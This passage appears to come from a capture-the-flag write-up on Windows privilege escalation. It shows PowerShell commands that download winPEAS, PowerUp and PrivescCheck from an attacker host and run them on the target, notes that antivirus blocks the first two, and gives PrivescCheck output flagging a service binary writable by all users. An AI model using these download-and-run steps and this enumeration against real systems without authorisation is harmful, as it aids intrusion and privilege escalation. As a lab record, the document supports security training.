PEAS
Conducting an automated enumeration after performing a manual enumeration on the HACKSMARTERSEC(10.10.183.209) host.
PS C:\tmp> curl http://10.9.0.130/winPEASany.exe -OutFile .\winPEASany.exeDelivery complete
PS C:\tmp> .\winPEASany.exe
Program 'winPEASany.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially
unwanted softwareAt line:1 char:1
+ .\winPEASany.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASany.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailedBlocked by AV
PowerUp
PS C:\tmp> curl http://10.9.0.130/PowerUp.ps1 -OutFile .\PowerUp.ps1Delivery complete
PS C:\tmp> . .\PowerUp.ps1
. : Operation did not complete successfully because the file contains a virus or potentially unwanted software.
At line:1 char:3
+ . .\PowerUp.ps1
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundExceptionBlocked by AV
PrivescCheck
PS C:\tmp> curl http://10.9.0.130/PrivescCheck.ps1 -OutFile .\PrivescCheck.ps1Delivery complete
PS C:\tmp> . .\PrivescCheck.ps1
Successfully imported and executed without getting flagged by AV
Services
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ Service list (non-default) ┃
┃ TYPE ┃ Base ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by ┃
┃ parsing the target executable's metadata and checking ┃
┃ whether the publisher is Microsoft. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
Name : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User : LocalSystem
StartMode : Automatic
Name : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User : LocalSystem
StartMode : Automatic
Name : cfn-hup
DisplayName : CloudFormation cfn-hup
ImagePath : "C:\Program Files\Amazon\cfn-bootstrap\winhup.exe"
User : LocalSystem
StartMode : Manual
Name : rpcapd
DisplayName : Remote Packet Capture Protocol v.0 (experimental)
ImagePath : "C:\Program Files (x86)\WinPcap\rpcapd.exe" -d -f "C:\Program Files (x86)\WinPcap\rpcapd.ini"
User : LocalSystem
StartMode : Manual
Name : Server Administrator
DisplayName : DSM SA Connection Service
ImagePath : "C:\Program Files\Dell\SysMgt\oma\bin\dsm_om_connsvc64.exe"
User : LocalSystem
StartMode : Automatic
Name : spoofer-scheduler
DisplayName : Spoofer Scheduler
ImagePath : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
User : LocalSystem
StartMode : Automatic
Name : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath : C:\Windows\System32\OpenSSH\ssh-agent.exe
User : LocalSystem
StartMode : Disabled
Name : sshd
DisplayName : OpenSSH SSH Server
ImagePath : C:\Windows\System32\OpenSSH\sshd.exe
User : LocalSystem
StartMode : Automaticspoofer-scheduler
Vulnerable Services
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation ┃
┃ NAME ┃ Service image file permissions ┃
┃ TYPE ┃ Base ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Check whether the current user has any write permissions on ┃
┃ a service's binary or its folder. ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
Name : spoofer-scheduler
DisplayName : Spoofer Scheduler
User : LocalSystem
ImagePath : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
StartMode : Automatic
Type : Win32OwnProcess
RegistryKey : HKLM\SYSTEM\CurrentControlSet\Services
RegistryPath : HKLM\SYSTEM\CurrentControlSet\Services\spoofer-scheduler
Status : Running
UserCanStart : True
UserCanStop : True
ModifiablePath : C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe
IdentityReference : BUILTIN\Users (S-1-5-32-545)
Permissions : AllAccess
[*] Status: Vulnerable - Severity: High - Execution time: 00:00:16.474